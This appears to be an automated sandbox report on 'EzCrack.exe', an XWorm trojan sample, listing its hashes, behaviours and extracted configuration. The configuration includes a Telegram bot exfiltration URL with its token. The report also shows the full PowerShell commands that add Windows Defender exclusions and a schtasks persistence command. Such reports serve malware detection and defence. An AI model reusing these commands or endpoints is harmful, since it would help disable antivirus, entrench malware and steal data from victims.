Analysis
-
max time kernel
132s -
max time network
146s -
platform
windows10-2004_x64 -
resource
win10v2004-20240508-en -
resource tags
arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system -
submitted
03-06-2024 16:13
Behavioral task
behavioral1
Sample
EzCrack.exe
Resource
win7-20240508-en
Behavioral task
behavioral2
Sample
EzCrack.exe
Resource
win10v2004-20240508-en
General
-
Target
EzCrack.exe
-
Size
78KB
-
MD5
9efc872f4f99869fd6befd84076b1f02
-
SHA1
6bb6931b260936082028812f079f5b4543e599e0
-
SHA256
4e8aad0b31678291ca4b4dae74385c6a0d424b7c49a439f045573f93908a764c
-
SHA512
cfc949b9db32db43a9f0ab9dd5c59624999c8df84aaeb953251198958a10dd744e273f560f4b16cd150c5bff1d66e6014f198ca0ea3f85e5afe189fe78e8c381
-
SSDEEP
1536:dRNd9tEnU5G+eiIhLK7AiVqbDoxTBH/d1Pq63FBN77OCXnG73E:drdARhLIVqbDSH/dVPN3OCXGDE
Malware Config
Extracted
xworm
-
Install_directory
%Temp%
-
install_file
ApplicationFrameHost.exe
-
pastebin_url
https://pastebin.com/raw/gf3CpGLZ
-
telegram
https://api.telegram.org/bot7330774245:AAFjajgEdSRi37pBSVsgsnILKxiBDZzP_f4/sendMessage?chat_id=5561074001
Signatures
-
Detect Xworm Payload 2 IoCs
Processes:
resource yara_rule behavioral2/memory/4724-1-0x00000000006F0000-0x000000000070A000-memory.dmp family_xworm C:\Users\Admin\AppData\Local\Temp\ApplicationFrameHost.exe family_xworm -
Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepid process 3428 powershell.exe 2596 powershell.exe 3236 powershell.exe 2496 powershell.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
EzCrack.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation EzCrack.exe -
Drops startup file 2 IoCs
Processes:
EzCrack.exedescription ioc process File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ApplicationFrameHost.lnk EzCrack.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ApplicationFrameHost.lnk EzCrack.exe -
Executes dropped EXE 2 IoCs
Processes:
ApplicationFrameHost.exeApplicationFrameHost.exepid process 908 ApplicationFrameHost.exe 2300 ApplicationFrameHost.exe -
Adds Run key to start application 2 TTPs 1 IoCs
Processes:
EzCrack.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ApplicationFrameHost = "C:\\Users\\Admin\\AppData\\Local\\Temp\\ApplicationFrameHost.exe" EzCrack.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
-
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 22 ip-api.com -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Suspicious behavior: EnumeratesProcesses 9 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exeEzCrack.exepid process 3428 powershell.exe 3428 powershell.exe 2596 powershell.exe 2596 powershell.exe 3236 powershell.exe 3236 powershell.exe 2496 powershell.exe 2496 powershell.exe 4724 EzCrack.exe -
Suspicious use of AdjustPrivilegeToken 8 IoCs
Processes:
EzCrack.exepowershell.exepowershell.exepowershell.exepowershell.exeApplicationFrameHost.exeApplicationFrameHost.exedescription pid process Token: SeDebugPrivilege 4724 EzCrack.exe Token: SeDebugPrivilege 3428 powershell.exe Token: SeDebugPrivilege 2596 powershell.exe Token: SeDebugPrivilege 3236 powershell.exe Token: SeDebugPrivilege 2496 powershell.exe Token: SeDebugPrivilege 4724 EzCrack.exe Token: SeDebugPrivilege 908 ApplicationFrameHost.exe Token: SeDebugPrivilege 2300 ApplicationFrameHost.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
Processes:
EzCrack.exepid process 4724 EzCrack.exe -
Suspicious use of WriteProcessMemory 10 IoCs
Processes:
EzCrack.exedescription pid process target process PID 4724 wrote to memory of 3428 4724 EzCrack.exe powershell.exe PID 4724 wrote to memory of 3428 4724 EzCrack.exe powershell.exe PID 4724 wrote to memory of 2596 4724 EzCrack.exe powershell.exe PID 4724 wrote to memory of 2596 4724 EzCrack.exe powershell.exe PID 4724 wrote to memory of 3236 4724 EzCrack.exe powershell.exe PID 4724 wrote to memory of 3236 4724 EzCrack.exe powershell.exe PID 4724 wrote to memory of 2496 4724 EzCrack.exe powershell.exe PID 4724 wrote to memory of 2496 4724 EzCrack.exe powershell.exe PID 4724 wrote to memory of 4616 4724 EzCrack.exe schtasks.exe PID 4724 wrote to memory of 4616 4724 EzCrack.exe schtasks.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\EzCrack.exe"C:\Users\Admin\AppData\Local\Temp\EzCrack.exe"1⤵
- Checks computer location settings
- Drops startup file
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\EzCrack.exe'2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'EzCrack.exe'2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\ApplicationFrameHost.exe'2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'ApplicationFrameHost.exe'2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "ApplicationFrameHost" /tr "C:\Users\Admin\AppData\Local\Temp\ApplicationFrameHost.exe"2⤵
- Creates scheduled task(s)
-
C:\Users\Admin\AppData\Local\Temp\ApplicationFrameHost.exeC:\Users\Admin\AppData\Local\Temp\ApplicationFrameHost.exe1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\ApplicationFrameHost.exeC:\Users\Admin\AppData\Local\Temp\ApplicationFrameHost.exe1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v13
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\ApplicationFrameHost.exe.logFilesize
654B
MD52ff39f6c7249774be85fd60a8f9a245e
SHA1684ff36b31aedc1e587c8496c02722c6698c1c4e
SHA256e1b91642d85d98124a6a31f710e137ab7fd90dec30e74a05ab7fcf3b7887dced
SHA5121d7e8b92ef4afd463d62cfa7e8b9d1799db5bf2a263d3cd7840df2e0a1323d24eb595b5f8eb615c6cb15f9e3a7b4fc99f8dd6a3d34479222e966ec708998aed1
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.logFilesize
2KB
MD5d85ba6ff808d9e5444a4b369f5bc2730
SHA131aa9d96590fff6981b315e0b391b575e4c0804a
SHA25684739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA5128c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
944B
MD535967cf5ed9a95ec4fe527dd96567a02
SHA16a7439c241a30ec540d5d204e02a4cbb2a464737
SHA2564394552922777081d43fb523126cf176d5a676602a5435713320942034f6b3cf
SHA512419b3c336a67ef964bc166d1267cea146ed5878f98304d6e39fb9a3c0394d75693810a9ddc101cdda5e3196ad7d603df01a3260705cf9ef7cf8d4b252df01f45
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
944B
MD57a451cd1316d70a65910773fee8c3a43
SHA1d2db32d5037153dd1d94565b51b5b385817a3c3d
SHA256862d25ed22075f3d1f5e8d29a3c6e050dc91e53a4dc653c3f0f7c627a12ee26c
SHA51260887f795036fbd6d25234c17dab4463a8a02f576ae8c07dd7b4c4ff1dba35f99b7301139ea051a7a80fdfc9e003a2f0c2dd0d444a82ecf87a3df21507332aa6
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
944B
MD53e242d3c4b39d344f66c494424020c61
SHA1194e596f33d54482e7880e91dc05e0d247a46399
SHA256f688037cb0c9f9c97b3b906a6c0636c91ad1864564feb17bba4973cde361172e
SHA51227c1cd6d72554fdce3b960458a1a6bd3f740aa7c22a313a80b043db283a224bf390648b9e59e6bdbf48020d082d728fbde569bee4ee2a610f21d659a7b3dfa02
-
C:\Users\Admin\AppData\Local\Temp\ApplicationFrameHost.exeFilesize
78KB
MD59efc872f4f99869fd6befd84076b1f02
SHA16bb6931b260936082028812f079f5b4543e599e0
SHA2564e8aad0b31678291ca4b4dae74385c6a0d424b7c49a439f045573f93908a764c
SHA512cfc949b9db32db43a9f0ab9dd5c59624999c8df84aaeb953251198958a10dd744e273f560f4b16cd150c5bff1d66e6014f198ca0ea3f85e5afe189fe78e8c381
-
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_a5u10viu.5dw.ps1Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
memory/3428-9-0x000001F3554F0000-0x000001F355512000-memory.dmpFilesize
136KB
-
memory/3428-18-0x00007FFFF3A30000-0x00007FFFF44F1000-memory.dmpFilesize
10.8MB
-
memory/3428-15-0x00007FFFF3A30000-0x00007FFFF44F1000-memory.dmpFilesize
10.8MB
-
memory/3428-14-0x00007FFFF3A30000-0x00007FFFF44F1000-memory.dmpFilesize
10.8MB
-
memory/3428-3-0x00007FFFF3A30000-0x00007FFFF44F1000-memory.dmpFilesize
10.8MB
-
memory/4724-0-0x00007FFFF3A33000-0x00007FFFF3A35000-memory.dmpFilesize
8KB
-
memory/4724-57-0x00007FFFF3A33000-0x00007FFFF3A35000-memory.dmpFilesize
8KB
-
memory/4724-58-0x00007FFFF3A30000-0x00007FFFF44F1000-memory.dmpFilesize
10.8MB
-
memory/4724-2-0x00007FFFF3A30000-0x00007FFFF44F1000-memory.dmpFilesize
10.8MB
-
memory/4724-1-0x00000000006F0000-0x000000000070A000-memory.dmpFilesize
104KB